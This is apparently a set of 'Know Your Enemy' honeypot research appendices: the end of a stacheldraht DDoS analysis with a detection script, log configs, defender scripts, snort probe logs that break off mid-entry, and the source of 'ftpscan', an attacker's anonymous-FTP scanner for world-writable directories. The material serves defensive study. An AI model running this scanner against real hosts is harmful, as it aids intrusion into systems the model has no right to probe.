/tmp/... mserv 1073 root rtd DIR 3,3 1024 2 / mserv 1073 root txt REG 3,3 50506 41421 /tmp/.../mserv mserv 1073 root mem REG 3,3 342206 30722 /lib/ld-2.1.1.so mserv 1073 root mem REG 3,3 63878 30731 /lib/libcrypt-2.1.1.so mserv 1073 root mem REG 3,3 4016683 30729 /lib/libc-2.1.1.so mserv 1073 root 0u CHR 136,4 6 /dev/pts/4 mserv 1073 root 1u CHR 136,4 6 /dev/pts/4 mserv 1073 root 2u CHR 136,4 6 /dev/pts/4 mserv 1073 root 3u inet 2144 TCP *:16660 (LISTEN) mserv 1088 root cwd DIR 3,3 2048 40961 /tmp/... mserv 1088 root rtd DIR 3,3 1024 2 / mserv 1088 root txt REG 3,3 50506 41421 /tmp/.../mserv mserv 1088 root mem REG 3,3 342206 30722 /lib/ld-2.1.1.so mserv 1088 root mem REG 3,3 63878 30731 /lib/libcrypt-2.1.1.so mserv 1088 root mem REG 3,3 4016683 30729 /lib/libc-2.1.1.so mserv 1088 root 0u CHR 136,4 6 /dev/pts/4 mserv 1088 root 1u CHR 136,4 6 /dev/pts/4 mserv 1088 root 2u CHR 136,4 6 /dev/pts/4 mserv 1088 root 3r FIFO 0,0 2227 pipe mserv 1088 root 5w FIFO 0,0 2227 pipe mserv 1091 root cwd DIR 3,3 2048 40961 /tmp/... mserv 1091 root rtd DIR 3,3 1024 2 / mserv 1091 root txt REG 3,3 50506 41421 /tmp/.../mserv mserv 1091 root mem REG 3,3 342206 30722 /lib/ld-2.1.1.so mserv 1091 root mem REG 3,3 63878 30731 /lib/libcrypt-2.1.1.so mserv 1091 root mem REG 3,3 4016683 30729 /lib/libc-2.1.1.so mserv 1091 root 0u CHR 136,4 6 /dev/pts/4 mserv 1091 root 1u CHR 136,4 6 /dev/pts/4 mserv 1091 root 2u CHR 136,4 6 /dev/pts/4 mserv 1091 root 3r FIFO 0,0 2240 pipe mserv 1091 root 4u inet 2215 TCP 192.168.0.1:16660->10.0.0.1:1029 (ESTABLISHED) mserv 1091 root 5w FIFO 0,0 2240 pipe ------------------------------------------------------------------------------ The agent, which also forks when in use, looks like this: ------------------------------------------------------------------------------ # lsof -c ttymon COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME ttymon 437 root cwd DIR 3,1 1024 37208 /usr/lib/libx/... ttymon 437 root rtd DIR 3,1 1024 2 / ttymon 437 root txt REG 3,1 324436 37112 /usr/lib/libx/.../ttymon ttymon 437 root mem REG 3,1 243964 29140 /lib/libnss_files-2.1.1.so ttymon 437 root mem REG 3,1 4016683 29115 /lib/libc-2.1.1.so ttymon 437 root mem REG 3,1 342206 28976 /lib/ld-2.1.1.so ttymon 437 root 3u sock 0,0 779 can't identify protocol ttymon 449 root cwd DIR 3,1 1024 37208 /usr/lib/libx/... ttymon 449 root rtd DIR 3,1 1024 2 / ttymon 449 root txt REG 3,1 324436 37112 /usr/lib/libx/.../ttymon ttymon 449 root 0u inet 811 TCP *:32222 (LISTEN) ttymon 449 root 3u sock 0,0 779 can't identify protocol ------------------------------------------------------------------------------ Defenses -------- Because the programs use ICMP_ECHOREPLY packets for communication, it will be very difficult (if not impossible) to block it without breaking most Internet programs that rely on ICMP. The Phrack paper on LOKI states: The only sure way to destroy this channel is to deny ALL ICMP_ECHO traffic into your network. Short of rejecting this traffic, it will instead be necessary to observe the difference between "normal" use of ICMP_ECHO and ICMP_ECHOREPLY packets by programs like "ping". This will not be an easy task, especially on large networks. (See the LOKI paper for more details.) The real defense is to make sure that *all* systems are kept up to date with security patches, unnecessary services are turned off, and competent system administrators are running and monitoring every Unix system on your network. (I'll hold my breath while you go make that happen, OK? ;) Weaknesses ---------- If the source has not been modified, you can identify stacheldraht clients/handlers/agents by the embedded strings shown earlier. The .distro command uses the Berkeley "rcp" command for obtaining updated copies of the agent. Monitoring "rcp" connections (514/tcp) from multiple systems on your network, in quick succession, to a single IP address outside your network would be a good trigger. (Note that the use of "rcp" in a this form requires an anonymous trust relationship, usually in the form of "+ +" in a user's ~/.rhosts file, which also will allow you to immediately archive the contents of this account while contacting the owners to preserve evidence.) The IP spoof test uses a constant source address of "3.3.3.3". Watch for this to show up in the source address of outgoing unsolicited ICMP_ECHOREPLY packets. (If you do RFC 2267 style egress filtering, you will have to watch for these packets from somewhere inside your border routers, or on each subnet. Ethernet switches will make this more difficult to do on local subnets, so an intrusion detection system (IDS) just inside your borders would be the best way to do this for your entire network.) Since stacheldraht uses ICMP_ECHOREPLY packets for some of its functioning, and those TCP connections that it uses employ Blowfish encryption of the data stream, it will be difficult to detect stacheldraht in action, and the ICMP_ECHOREPLY packets will go right through most firewalls. Programs like "ngrep" do not process ICMP packets, so you will not as easily (at this point in time) be able to watch for strings in the data portion of the ICMP packets (except using the patches to tcpshow from Appendix C and patches to sniffit provided in the analysis of TFN). Stacheldraht does not authenticate the source of ICMP packets, and also does not encrypt strings embedded in ICMP packets. If the command values have not been changed from the default, as few as just one packet would be necessary to flush out an agent. Either: a). send an ICMP_ECHOREPLY packet with an ID field value of 668 and watch for an ICMP_ECHOREPLY packet to come back with an ID field value of 669 and the string "sicken\n" in the data field, or b). send an ICMP_ECHOREPLY packet with a source address of "3.3.3.3" (and ID value of 666 and data field with "skillz" if you want to go all out) and watch for an ICMP_ECHOREPLY packet to come back with an ID field value of 1000 and the string "spoofworks" in the data field. (A Perl script using Net::RawIP named "gag" has been developed to accomplish the former. See Appendix A). The next logical evolutionary steps ----------------------------------- When I first started analyzing trinoo source code back in early October, and after having observed TFN binaries in action just after that, it was obvious to me that encryption of communication channels and more automated maintenance of large networks was in active development. Discussions with others at the CERT workshop in November brought out many other new feature ideas that I'm sure the underground is also thinking of. Having now seen the stacheldraht code, and that of yet another unreleased distributed denial of service attack tool (for a total of four different handler/agent distributed DoS tools found "in the wild" this year), the assumptions about the evolution of these tools appear to have been correct, even if the code remains a bit unfinished and with a few bugs (e.g., installations witnessed as late as December 20 continue to include cron entries that re-start the agent every minute!) I can't wait to see what the New Year will bring. ;) :( ?? @#$%^&*!!! -- David Dittrich http://staff.washington.edu/dittrich/ Appendix A - Perl script "gag" to detect stacheldraht agents ------------------------------------------------------------ ------------------------------- cut here ----------------------------------- #!/usr/bin/perl # # gag v. 1.0 # By Dave Dittrich # # Send an ICMP_ECHOREPLY packet with ID of 668 to a stacheldraht # agent, causing it to reply to the sending host with an # ICMP_ECHOREPLY packet with an ID of 669 and the string "sicken\n" # in the data field of the packet. Watch for this with tcpdump, # sniffit, etc., e.g.: # # # tcpdump -s 1500 -w stach.dump 'icmp[4:2] = 669' # # tcpshow < stach.dump # # Needs Net::RawIP (http://quake.skif.net/RawIP) # Requires libpcap (ftp://ftp.ee.lbl.gov/libpcap.tar.Z) # # Example: ./gag [options] host1 [host2 [...]] # # (This code was hacked from the "macof" program, written by # Ian Vitek ) require 'getopts.pl'; use Net::RawIP; require 'netinet/in.ph'; $a = new Net::RawIP({icmp => {}}); chop($hostname = `hostname`); Getopts('a:c:f:i:vh'); die "usage: $0 [options] iplist\ \t-a arg\t\tSend command argument 'arg' (default \"gesundheit!\")\ \t-c val\t\tSend command value 'val' (default 668 - ID_TEST)\ \t-f from_host\t\t(default:$hostname)\ \t-i interface \t\tSet sending interface (default:eth0)\ \t-v\t\t\tVerbose\ \t-h This help\n" unless ( !$opt_h ); # set default values $opt_i = ($opt_i) ? $opt_i : "eth0"; $opt_a = ($opt_a) ? $opt_a : "gesundheit!"; $opt_c = ($opt_c) ? $opt_c : "668"; # choose network card if($opt_e) { $a->ethnew($opt_i, dest => $opt_e); } else { $a->ethnew($opt_i); } $s_host = ($opt_h) ? $opt_h : $hostname; if ($ARGV[0]) { open(I,"<$ARGV[0]") || die "could not open file: '$ARGV[0]'"; while () { chop; push(@list,$_); } close(I); } # Put value in network byte order (couldn't get htons() in # "netinet/in.ph" to work. Go figure.) $id = unpack("S", pack("n", $opt_c)); foreach $d_host (@list) { $a->set({ip => {saddr => $s_host, daddr => $d_host}, icmp => {type => 0, id => $id, data => $opt_a} }); print "sending packet [$opt_c/\"$opt_a\"] to $d_host\n" if $opt_v; $a->send; } exit(0); ------------------------------- cut here ----------------------------------- Appendix B - References ----------------------- TCP/IP Illustrated, Vol. I, II, and III. W. Richard Stevens and Gary R. Wright., Addison-Wesley. The DoS Project's "trinoo" distributed denial of service attack tool http://staff.washington.edu/dittrich/misc/trinoo.analysis The "Tribe Flood Network" distributed denial of service attack tool http://staff.washington.edu/dittrich/misc/tfn.analysis CERT Distributed System Intruder Tools Workshop report http://www.cert.org/reports/dsit_workshop.pdf CERT Advisory CA-99-17 Denial-of-Service Tools http://www.cert.org/advisories/CA-99-17-denial-of-service-tools.html Distributed denial of service attack tools at Packet Storm Security http://packetstorm.securify.com/distributed/ tcpdump: ftp://ftp.ee.lbl.gov/tcpdump.tar.Z tcpshow: http://packetstorm.securify.com/linux/trinux/src/tcpshow.c sniffit: http://sniffit.rug.ac.be/sniffit/sniffit.html Net::RawIP: http://quake.skif.net/RawIP loki client/server: Phrack Magazine, Volume Seven, Issue Forty-Nine, File 06 of 16, [ Project Loki ] http://www.phrack.com/search.phtml?view&article=p49-6 Phrack Magazine Volume 7, Issue 51 September 01, 1997, article 06 of 17 [ L O K I 2 (the implementation) ] http://www.phrack.com/search.phtml?view&article=p51-6 libnet: http://www.packetfactory.net/libnet ---------------------------------------------------------------------------- Appendix C: Patches to tcpshow 1.0 to display ICMP ECHO id/seq ---------------------------------------------------------------------- diff -c tcpshow/tcpshow.c tcpshow.orig/tcpshow.c *** tcpshow/tcpshow.c Mon Dec 27 16:21:54 1999 --- tcpshow.orig/tcpshow.c Thu Oct 21 14:12:19 1999 *************** *** 1081,1088 **** uint2 nskipped; uint1 type; char *why; - uint2 echo_id; - uint2 echo_seq; type = getbyte(&pkt); nskipped = sizeof(type); --- 1081,1086 ---- *************** *** 1093,1103 **** /* Must calculate it from the size of the IP datagram - the IP header. */ datalen -= ICMPHDRLEN; - if (type == ECHO_REQ || type == ECHO_REPLY) { - echo_id = getword(&pkt); nskipped += sizeof(cksum); - echo_seq = getword(&pkt); nskipped += sizeof(cksum); - } - why = icmpcode(type, code); if (dataflag) { printf( --- 1091,1096 ---- *************** *** 1120,1129 **** icmptype(type), why? "\n\tBecause:\t\t\t": "", why? why: "" ); printf("\tChecksum:\t\t\t0x%04X\n", cksum); - if (type == ECHO_REQ || type == ECHO_REPLY) { - printf("\tId:\t\t\t\t0x%04X (%d)\n", echo_id, echo_id); - printf("\tSequence:\t\t\t0x%04X (%d)\n", ntohs(echo_seq), ntohs(echo_seq)); - } } return pkt; --- 1113,1118 ---- *************** *** 1194,1200 **** printf("\tVersion:\t\t\t4\n\tHeader Length:\t\t\t%d bytes\n", hlen); printf("\tService Type:\t\t\t0x%02X\n", (uint2)servtype); printf("\tDatagram Length:\t\t%d bytes\n", dgramlen); ! printf("\tIdentification:\t\t\t0x%04X (%d)\n", id, id); printf( "\tFlags:\t\t\t\tMF=%s DF=%s\n", (flags & MF) == MF? on: off, (flags & DF) == DF? on_e: off_e --- 1183,1189 ---- printf("\tVersion:\t\t\t4\n\tHeader Length:\t\t\t%d bytes\n", hlen); printf("\tService Type:\t\t\t0x%02X\n", (uint2)servtype); printf("\tDatagram Length:\t\t%d bytes\n", dgramlen); ! printf("\tIdentification:\t\t\t0x%04X\n", id); printf( "\tFlags:\t\t\t\tMF=%s DF=%s\n", (flags & MF) == MF? on: off, (flags & DF) == DF? on_e: off_e ---------------------------------------------------------------------- -- Dave Dittrich Client Services dittrich@cac.washington.edu Computing & Communications University of Washington Dave Dittrich / dittrich@cac.washington.edu [PGP Key] PGP 6.5.1 key fingerprint: FE 97 0C 57 08 43 F3 EB 49 A1 0C D0 8E 0C D0 BE C8 38 CC B5 EoF Serverlog example Know your enemy #2 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ *.* @192.168.41.15 # Log all kernel messages to the console. # Logging much else clutters up the screen. #kern.* /dev/console # Log anything (except mail) of level info or higher. #Don't log private authentication messages! *.info;mail.none;authpriv.none /var/log/messages # The authpriv file has restricted access. authpriv.* /var/log/secure # Log all the mail messages in one place. mail.* /var/log/maillog # Log all ssh1 traffic local1.info /var/log/sshdlog # Everybody gets emergency messages, plus log them on another # machine. *.emerg * # Save mail and news errors of level err and higher in a # special file. uucp,news.crit /var/log/spooler EoF ftp-scan.c Know your enemy #2 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* * ftpscan 1.o - by vENOMOUS of rdC - Mar 29, 1999 * * This will open a specific file [-f file], get the IPs from it, * then, check if FTP port [ -p 21 ] is open and log the version. * If you specify the [ -o ] flag it will try log into the FTP * and execute LIST command [recursive], this is usefull * for see if there are any world writeable directories. * * You should know what you can do with that. * * credits: localip (lip) routine has been taken from queSO. * * Greets: ka0z [!thanks for the help, ideas and advices buddy!] - meengo * #rdC - ub * */ #include #include #include #include #include #include #include #include #include #include #include #include "blah.h" /* taken from queSO */ char rdcopenfile(char g0d[257]); void usage(char *damn); void RDCconnect2(char host[1000], int puerto); int bindit(int socket_type, u_short port, int *listener); void sigh(int z); u_long lip(void); /* QueSO */ FILE *file; FILE *fileout; char ipsfile[256], bleh[100000][200], homer[256], beer[256], huhense[32]; u_long localip; int sockfd, leen2=0, listing=0, sockfd1, ip1=0, ip2=0, ip3=0, ip4=0, lsock=-1, port2=-1, lala=0, dfinder=0, gotit=0, xx=0; int main(int argc, char **argv) { char arg; int p0rt=21; if ( argc < 3 ) { usage(argv[0]); } while ((arg = getopt(argc, argv, "f:p:o")) != EOF) { switch(arg) { case 'f': strncpy(ipsfile,optarg,128); break; case 'p': p0rt = atoi (optarg); break; case 'o': listing = 1; break; default: usage(argv[0]); break; } } while (dfinder < 5) { char disp[500]; sprintf(disp,"ppp%d",dfinder); strcpy(huhense,disp); localip = lip(); sscanf((char *) inet_ntoa(localip),"%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4); if ((ip3 && ip4) != 0) { gotit=1; break; } dfinder++; } dfinder=0; if (gotit == 1) dfinder=6; while (dfinder < 5) { char disp[500]; sprintf(disp,"eth%d",dfinder); strcpy(huhense,disp); localip = lip(); sscanf((char *) inet_ntoa(localip),"%d.%d.%d.%d", &ip1, &ip2, &ip3,&ip4); if ((ip3 && ip4) != 0) { gotit=1; break; } dfinder++; } if (gotit == 0) { fprintf(stdout,"\nCannot define local ip address, aborting!\n\n"); fflush(stdout); exit(1); } fprintf(stdout,"Local IP is %s\nStarting Scan... \n\n",inet_ntoa(localip)); fflush(stdout); sprintf(beer,"PORT %d,%d,%d,%d,69,%d\nLIST -lR\n", ip1, ip2, ip3 ,ip4, 222 + lala); strlen(beer); rdcopenfile(ipsfile); for (xx = 0 ; xx < leen2 ; xx++) { RDCconnect2(bleh[xx], p0rt); lala++; } } char rdcopenfile(char g0d[257]) { int x; /* see if the file can be read... */ if ((file=fopen(g0d,"r")) == NULL) { printf("\nftpscan 1.o by vENOMOUS of rdC - venomous@iname.com - o3/99\n"); printf("\nCannot open file %s for reading\n\n", g0d); exit(1); } /* get the all the lines */ for ( ; fgets(bleh[leen2], 190, file) != NULL ; leen2++); fclose(file); } void RDCconnect2(char host[1000], int puerto) { char versi0n[5000]; int nmb; struct sockaddr_in beb; struct hostent *d0h; // struct timeval timev; beb.sin_family = AF_INET; beb.sin_port = htons(puerto); d0h = gethostbyname(host); if (!d0h) { if ( (beb.sin_addr.s_addr = inet_addr(host)) == INADDR_NONE) { printf("\nftpscan 1.o by vENOMOUS of rdC - venomous@iname.com - o3/99\n"); printf("\nPut a correct address\n\n"); exit(0); } } else { bcopy( d0h->h_addr, (struct in_addr *) &beb.sin_addr, d0h->h_length); } strcpy(homer,"unable to connect: Connection refused"); sockfd = socket(AF_INET, SOCK_STREAM,0); fprintf(stdout,"\n------------------------------------------------------------------------------n"); fprintf(stdout,"IP: %s", host); fflush(stdout); signal(SIGALRM, sigh); alarm(10); if(connect(sockfd, (struct sockaddr *)&beb, sizeof(struct sockaddr)) < 0) { fprintf(stdout,"%s\n\n",homer); fflush(stdout); return; } alarm(0); bzero(versi0n, sizeof(versi0n)); if ((nmb = recv(sockfd, versi0n, 5000, 0)) == -1) { fprintf(stdout,"Connection reset by peer?\n\n"); fflush(stdout); } if (strlen(versi0n) == 0) { close(sockfd); return; } if (strstr(versi0n,"Microsoft") != NULL) { fprintf(stdout,"Skipping host, cuz its runing wind0ze\n\n"); fflush(stdout); close(sockfd); return; } if (strstr(versi0n,"WinSock") != NULL) { fprintf(stdout,"Skipping host, cuz its runing wind0ze\n\n"); fflush(stdout); close(sockfd); return; } if (strstr(versi0n,"NetWare") != NULL) { fprintf(stdout,"Skipping host cuz its runing NetWare\n\n"); fflush(stdout); close(sockfd); return; } if (strstr(versi0n,"Proxy Server") != NULL) { fprintf(stdout,"Runing ProxyServer, skipping host\n\n"); fflush(stdout); close(sockfd); return; } fprintf(stdout,"FTP banner:\n"); fprintf(stdout,"%s\n",versi0n); fflush(stdout); if (listing == 1) { char username[70], sendear[17200], listit[100]; int n; /* login in */ strcpy(username,"anonymous"); sprintf(sendear,"USER %s\n",username); fprintf(stdout,"Login as: %s\n",username); write(sockfd,sendear,strlen(sendear)); read(sockfd,sendear,sizeof(sendear)); if (strstr(sendear,"denied") != NULL) { fprintf(stdout,"Anonymous access denied, skipping\n\n"); close(sockfd); return; } if (strstr(sendear,"USER anonymous") != NULL) { fprintf(stdout,"Remote host has closed the connection.\n\n"); close(sockfd); return; } if (strstr(sendear,"unknown") != NULL) { fprintf(stdout,"Anonymous access unknown\n\n"); close(sockfd); return; } if (strstr(sendear,"not found") != NULL) { fprintf(stdout,"User anonymous not found\n\n"); close(sockfd); return; } fprintf(stdout,"Answer: %s\n",sendear); bzero(sendear, sizeof(sendear)); fprintf(stdout,"Using password: bleh@\n"); write(sockfd,"PASS bleh@\n",11); read(sockfd,sendear,sizeof(sendear)); if (strstr(sendear,"Can't set") != NULL) { fprintf(stdout,"Cant set guest privileges\n\n"); close(sockfd); return; } fprintf(stdout,"Answer: %s\n",sendear); bzero(sendear, sizeof(sendear)); fprintf(stdout,"Setting PORT to %d\n",17886+lala); bzero(beer,sizeof(beer)); sprintf(beer,"PORT %d,%d,%d,%d,69,%d\nLIST -lR\n",ip1, ip2, ip3 ,ip4, 222 + lala); write(sockfd,beer,strlen(beer) + 4); read(sockfd,beer,sizeof(beer)); /* bind the port for data transfer */ sockfd1 = bindit(SOCK_STREAM, port2, &lsock); read(sockfd,sendear,sizeof(sendear)); fprintf(stdout,"Using LIST command\n"); fprintf(stdout,"Answer: %s\n",sendear); bzero(sendear, sizeof(sendear)); read(sockfd1,sendear,sizeof(sendear)); fprintf(stdout,"Recursive list:\n %s\n",sendear); bzero(sendear, sizeof(sendear)); fflush(stdout); // lala++; } close(sockfd); close(sockfd1); } int bindit(int socket_type, u_short port, int *listener) { struct sockaddr_in address; int listening_socket; int connected_socket = -1; int reuse_addr = 1; char sendear[17200]; port = htons(17886+lala); memset((char *) &address, 0, sizeof(address)); address.sin_family = AF_INET; address.sin_port = port; address.sin_addr.s_addr = htonl(INADDR_ANY); listening_socket = socket(AF_INET, socket_type, 0); if (listening_socket < 0) { fprintf(stdout,"Cant recive list.\n\n"); fflush(stdout); return; } if (listener != NULL) *listener = listening_socket; setsockopt(listening_socket, SOL_SOCKET, SO_REUSEADDR, &reuse_addr, sizeof(reuse_addr)); if (bind(listening_socket, (struct sockaddr *) &address, sizeof(address)) < 0) { fprintf(stdout,"Error\n\n"); fflush(stdout); close(listening_socket); exit(1); } listen(listening_socket, 1); signal(SIGALRM, sigh); alarm(10); while(connected_socket < 0) { connected_socket = accept(listening_socket, NULL, NULL); } } void sigh(int z) { alarm(0); signal(SIGALRM, SIG_DFL); strcpy(homer,"Unable to connect: timeout"); } u_long lip (void) { int pvto, yesto, traversal; struct sockaddr_in *dim0n; struct ifreq *i; struct ifconf ic; char bufercito[512]; pvto = socket (AF_INET, SOCK_STREAM, 0); ic.ifc_pum = 512; ic.ifc_buf = bufercito; ioctl (pvto, SIOCGIFCONF, (char *) &ic); i = ic.ifc_req; yesto = (ic.ifc_pum / sizeof(struct ifreq)); for (traversal = 0; traversal < yesto; traversal++) { ioctl(pvto, SIOCGIFADDR, (char *) &i); dim0n = (struct sockaddr_in *) &i->ifr_ifru.ifru_addr; if (!strcmp (i->ifr_name, huhense)) return dim0n->sin_addr.s_addr; i++; } } void usage(char *damn) { printf("\n<[( ftpscan 1.o by vENOMOUS of rdC - venomous@iname.com - o3/99 )]>"); printf("<[( usage:\n"); printf("<[( %s -f file [-p port] [-o]\n\n",damn); printf("<[( -f file: file is the IPs file.\n"); printf("<[( -p port: port to connect to, default 21.\n"); printf("<[( -o: with this flag, ftpscan will log into the FTPserver\n"); printf("<[( as anonymous, and do a recursive list.\n\n"); exit(0); } EoF Scripts from Know your enemy #2 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From ant@notatla.demon.co.uk Tue May 2 13:26:38 2000 Date: Sun, 23 Apr 2000 20:35:11 +0100 From: Antonomasia To: lance@spitzner.net Subject: bash history logging Lance, In the bash-2.03 package of RH6.2 this mod will add history logging. It is done in the lib/readline/history.c file, concerned with recording commands rather than reading keystrokes, but the effect is almost the same. One thing this doesn't record is when someone repeats the last command because that does not generate a new history record. Just 2 things need to be added: an include of the syslog.h file and a syslog(3) call with the new history entry. I've split the syslog(3) section into 2 to cater for long and short lines separately because some syslog()s are/have been buggy. 1 /* History.c -- standalone history library */ 2 3 /* Copyright (C) 1989, 1992 Free Software Foundation, Inc. 32 #include + 33 #include 217 /* Place STRING at the end of the history list. The data field 218 is set to NULL. */ 219 void 220 add_history (string) 221 char *string; 222 { 223 HIST_ENTRY *temp; 224 + 225 if (strlen(string)<60) { + 226 syslog(LOG_INFO, "BASH2 HISTORY: PID=%d %s", getpid(), string); + 227 } else { + 228 char trunc[60]; + 229 + 230 strncpy(trunc,string,sizeof(trunc)); + 231 trunc[sizeof(trunc)-1]='\0'; + 232 syslog(LOG_INFO, "BASH2 HISTORY: PID=%d %s(++TRUNC)", + 233 getpid(), trunc); + 234 } 235 236 if (history_stifled && (history_length == max_input_history)) 237 { 238 register int i; -- ############################################################## # Antonomasia ant@notatla.demon.co.uk # # See http://www.notatla.demon.co.uk/ # ############################################################## EoF korn shell: ~~~~~~~~~~ #!/bin/ksh # # Created 20 April, 1999 # Lance Spitzner, lance@spitzner.net # # Shows last 10 entries of critical system logs. # Build in some "artificial intelligence" using # greps and sorts. You can select a specific # hosts logs, or you can select all hosts logs. # ##### Define input if [ "$1" = "all" ]; then system=":" else system=$1 fi log=$2 ##### Define logs inetdlog=/var/adm/inetdlog messages=/var/adm/messages syslog=/var/adm/syslog ##### Functions inetdlog () { echo "\n\t--- Last 10 entries in $inetdlog ---\n" grep "$system" "$inetdlog" | grep -v "172.16.1." | tail -10 } messages () { echo "\n\t--- Last 10 entries in $messages ---\n" grep "$system" "$messages" | egrep -v '(named|MARK)' | tail -10 } syslog () { echo "\n\t--- Last 10 entries in $syslog ---\n" grep "$system" "$syslog" | tail -10 } title () { if [ "$system" = ":" ]; then echo "\n### These are the log results of all systems ###" else echo "\n### These are the log results of system $system ###" fi } ##### Actual program case $log in inetdlog) title inetdlog ;; messages) title messages ;; syslog) title syslog ;; all) title inetdlog messages syslog ;; *) echo "\nUsage: `basename $0` " echo echo "\t " echo "\tCan either be a single source you want to grep" echo "\tfor in the log, or type \"all\" for all hosts in the" echo "\tlog file." echo echo "\t" echo "\tinetdlog -> for /var/log/inetdlog" echo "\tmessages -> for /var/log/messages" echo "\tsyslog -> for /var/log/syslog" echo "\tall -> for all three log files\n" ;; esac exit 0 honeypot activity logs : Know your enemy #3 : Forensics ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # # All the probes my network received in a sinlge month. # Starting 15 April, 2000 # # You can lookup the IDS number signatures at # Max Vision's ArachNIDs database at # http://www.whitehats.com # # Signatures captured using snort # http://www.snort.org # Apr 15 13:40:41 mozart snort[7002]: IDS212/dns-zone-transfer: 207.239.115.11:2307 -> 172.16.1.101:53 Apr 16 02:45:37 mozart snort[7483]: IDS13/portmap-request-mountd: 200.190.13.181:1372 -> 172.16.1.107:111 Apr 16 07:17:06 mozart snort[7483]: IDS128/web-cgi-phf: 200.190.8.220:55220 -> 172.16.1.107:80 Apr 16 14:54:20 mozart snort[7483]: IDS171/Ping zeros: 24.201.15.148 -> 172.16.1.101 Apr 16 14:54:20 mozart snort[7483]: IDS171/Ping zeros: 24.201.15.148 -> 172.16.1.105 Apr 16 14:54:20 mozart snort[7483]: IDS171/Ping zeros: 24.201.15.148 -> 172.16.1.107 Apr 17 06:02:32 mozart snort[8255]: IDS198/SYN FIN Scan: 195.116.152.104:0 -> 172.16.1.101:111 Apr 17 06:02:32 mozart snort[8255]: IDS198/SYN FIN Scan: 195.116.152.104:0 -> 172.16.1.107:111 Apr 17 09:45:28 mozart snort[8255]: IDS198/SYN FIN Scan: 195.116.152.104:0 -> 172.16.1.105:111 Apr 19 08:00:19 mozart snort[3515]: IDS/DNS-version-query: 212.25.75.196:1723 -> 172.16.1.101:53 Apr 20 01:26:00 mozart snort[3515]: IDS212/dns-zone-transfer: 24.234.45.60:4075 -> 172.16.1.107:53 Apr 20 03:49:38 mozart snort[3515]: IDS/DNS-version-query: 216.123.23.5:4349 -> 172.16.1.101:53 Apr 20 03:49:39 mozart snort[3515]: IDS/DNS-version-query: 216.123.23.5:4350 -> 172.16.1.107:53 Apr 20 21:48:55 mozart snort[12353]: IDS246/large-icmp: 129.142.224.3 -> 172.16.1.107 Apr 20 21:48:55 mozart snort[12353]: IDS246/large-icmp: 129.142.224.3 -> 172.16.1.107 Apr 20 22:46:57 mozart snort[12632]: IDS/RPC-rpcinfo-query: 207.239.115.11:3619 -> 172.16.1.107:111 Apr 20 22:48:13 mozart snort[12632]: IDS159/Ping Microsoft Windows: 216.228.4.204 -> 172.16.1.101 Apr 20 22:46:57 mozart snort[12632]: IDS/RPC-rpcinfo-query: 207.239.115.11:3619 -> 172.16.1.107:111 Apr 20 22:48:13 mozart snort[12632]: IDS159/Ping Microsoft Windows: 216.228.4.204 -> 172.16.1.101 Apr 20 23:00:33 mozart snort[12657]: IDS171/Ping zeros: 216.228.4.133 -> 172.16.1.101 Apr 21 11:01:27 mozart snort[12777]: IDS/DNS-version-query: 207.236.55.76:4039 -> 172.16.1.101:53 Apr 21 11:01:28 mozart snort[12777]: IDS/DNS-version-query: 207.236.55.76:4044 -> 172.16.1.107:53 Apr 22 08:36:29 mozart snort[743]: IDS/DNS-version-query: 212.244.222.100:1368 -> 172.16.1.101:53 Apr 22 08:36:29 mozart snort[743]: IDS/DNS-version-query: 212.244.222.100:1328 -> 172.16.1.107:53 Apr 22 10:00:23 mozart snort[743]: IDS/DNS-version-query: 212.244.222.100:4401 -> 172.16.1.101:53 Apr 22 10:00:23 mozart snort[743]: IDS/DNS-version-query: 212.244.222.100:4369 -> 172.16.1.107:53 Apr 22 11:31:58 mozart snort[743]: IDS/RPC-rpcinfo-query: 213.1.152.141:728 -> 172.16.1.101:111 Apr 23 01:33:51 mozart snort[3919]: IDS128/web-cgi-phf: 12.68.183.51:4310 -> 172.16.1.107:80 Apr 23 01:33:56 mozart snort[3919]: IDS218/web-cgi-test-cgi: 12.68.183.51:4312 -> 172.16.1.107:80 Apr 23 01:34:01 mozart snort[3919]: IDS235/web-cgi-handler: 12.68.183.51:4314 -> 172.16.1.107:80 Apr 23 01:34:20 mozart snort[3919]: IDS219/web-cgi-perl-exe: 12.68.183.51:4321 -> 172.16.1.107:80 Apr 23 01:34:36 mozart snort[3919]: IDS224/web-cgi-nph-test-cgi: 12.68.183.51:4328 -> 172.16.1.107:80 Apr 23 21:01:18 mozart snort[3919]: spp_portscan: PORTSCAN DETECTED from 210.178.9.125 Apr 23 21:01:25 mozart snort[3919]: IDS/RPC-rpcinfo-query: 210.178.9.125:850 -> 172.16.1.101:111 Apr 24 07:09:47 mozart snort[4663]: IDS212/dns-zone-transfer: 210.145.109.162:12540 -> 172.16.1.107:53 Apr 24 09:23:01 mozart snort[4663]: IDS7/SourcePortTraffic-53-tcp: 202.42.233.186:53 -> 172.16.1.107:111 Apr 24 09:23:01 mozart snort[4663]: IDS7/SourcePortTraffic-53-tcp: 202.42.233.186:53 -> 172.16.1.101:111 Apr 24 09:23:05 mozart snort[4663]: IDS/RPC-rpcinfo-query: 202.42.233.186:637 -> 172.16.1.107:111 Apr 24 09:23:10 mozart snort[4663]: IDS/RPC-rpcinfo-query: 202.42.233.186:638 -> 172.16.1.101:111 Apr 24 14:36:55 mozart snort[4663]: IDS162/Ping Nmap 2.36BETA: 194.222.156.169 -> 172.16.1.105 Apr 24 14:43:35 mozart snort[4663]: IDS162/Ping Nmap 2.36BETA: 194.222.156.169 -> 172.16.1.101 Apr 24 14:46:46 mozart snort[4663]: spp_portscan: PORTSCAN DETECTED from 194.222.156.169 Apr 24 14:46:46 mozart snort[4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482 Apr 24 17:59:51 mozart snort[4663]: IDS/DNS-version-query: 212.244.97.121:2891 -> 172.16.1.101:53 Apr 24 18:01:05 mozart snort[4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53 Apr 24 19:04:01 mozart snort[4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21 Apr 25 02:08:07 mozart snort[5875]: IDS/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53 Apr 25 02:08:07 mozart snort[5875]: IDS/DNS-version-query: 63.226.81.13:4630 